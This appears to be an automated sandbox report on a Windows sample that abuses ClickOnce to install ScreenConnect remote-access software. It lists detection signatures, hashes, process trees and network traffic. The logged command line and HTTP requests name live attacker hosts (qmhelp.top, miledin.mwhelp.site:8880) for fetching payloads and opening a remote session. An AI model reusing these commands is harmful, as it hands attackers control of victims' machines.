Windows Analysis Report
SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe

Overview

General Information

Sample name:SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe
Analysis ID:1638477
MD5:bfaaad29d18f516511ec1741e1a091db
SHA1:39e2258863f4e1035568a16eec5def14cb602986
SHA256:b609603b40e7eb6d2dfdea9ea187eb82c1a7b55c85965f694548dd6cef36e9f5
Tags:exe, user-SecuriteInfoCom

Detection

ScreenConnect Tool
Score:54
Range:0 - 100
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Detected potential unwanted application
Joe Sandbox ML detected suspicious sample
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Sigma detected: Potentially Suspicious Child Process Of ClickOnce Application
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe" MD5: BFAAAD29D18F516511EC1741E1A091DB)
    • dfsvc.exe (PID: 7148 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 6376 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe" MD5: AFA993C978BC52D51E8AF08A02892B4E)
        • ScreenConnect.ClientService.exe (PID: 6924 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1" MD5: D3E628C507DC331BAB3DE1178088C978)
          • WerFault.exe (PID: 7144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 1312 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.1766358365.000001BCA486A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000008.00000002.1325286877.000000000256A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: dfsvc.exe PID: 7148 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6376 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
8.0.ScreenConnect.WindowsClient.exe.2a0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

System Summary

Source: Network Connection | Author: Nasreddine Bencherchali (Nextron Systems) | Data: DestinationIp: 192.168.2.9, DestinationIsIpv6: false, DestinationPort: 49684, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7148, Protocol: tcp, SourceIp: 104.21.72.99, SourceIsIpv6: false, SourcePort: 443
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 1312, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 1312, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1", ParentImage: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe, ParentProcessId: 6924, ParentProcessName: ScreenConnect.ClientService.exe, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 1312, ProcessId: 7144, ProcessName: WerFault.exe
No Suricata rule has matched

AV Detection

Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe | Virustotal: Detection: 16%
Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe | ReversingLabs: Detection: 26%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 91.0% probability
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe | Code function: 0_2_003A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_003A1000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exe

Compliance

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exe
Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe | Static PE information: certificate valid
Source: unknown | HTTPS traffic detected: 104.21.72.99:443 -> 192.168.2.9:49684 version: TLS 1.2
Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb3 source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.000000000134A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb a source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: ScreenConnect.Core.pdbJt source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: ScreenConnect.Windows.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: C:\Windows\ScreenConnect.ClientService.pdbpdbice.pdbH source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb4 source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Core.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: ScreenConnect.Windows.pdbH source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: ScreenConnect.Core.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B62000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4788000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325166034.0000000002410000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325286877.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1289094143.0000000005582000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000009.00000000.1255423787.00000000009BD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: \??\C:\Windows\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nXC:\Windows\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287827656.0000000001158000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: nect.Core.pdbpdk source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\ScreenConnect.ClientService.pdb{ source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: mscorlib.pdbP source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: e.pdbh source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: reenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA45D8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325035100.00000000023D2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb= source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdbSystem.ni.dllSystem.Core.dll source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: n0C:\Windows\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.ClientService.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbta source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: @o.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4784000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4D29000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B5E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1289418244.00000000056A2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Binary string: %%.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbe source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb\ source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B66000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA478C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1289884811.0000000005CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: ?oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.pdb4 source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Core.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA45D8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325035100.00000000023D2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: Core.pdb/ source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERA625.tmp.dmp.11.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe | Code function: 0_2_003A4B9B FindFirstFileExA,0_2_003A4B9B
Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\
Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\
Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\2.0\
Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\
Source: global traffic | TCP traffic: 192.168.2.9:49714 -> 62.182.86.171:8880
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i= HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1 Host: www.qmhelp.top Accept-Encoding: gzip
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: www.qmhelp.top
                  Source: global trafficDNS traffic detected: DNS query: miledin.mwhelp.site
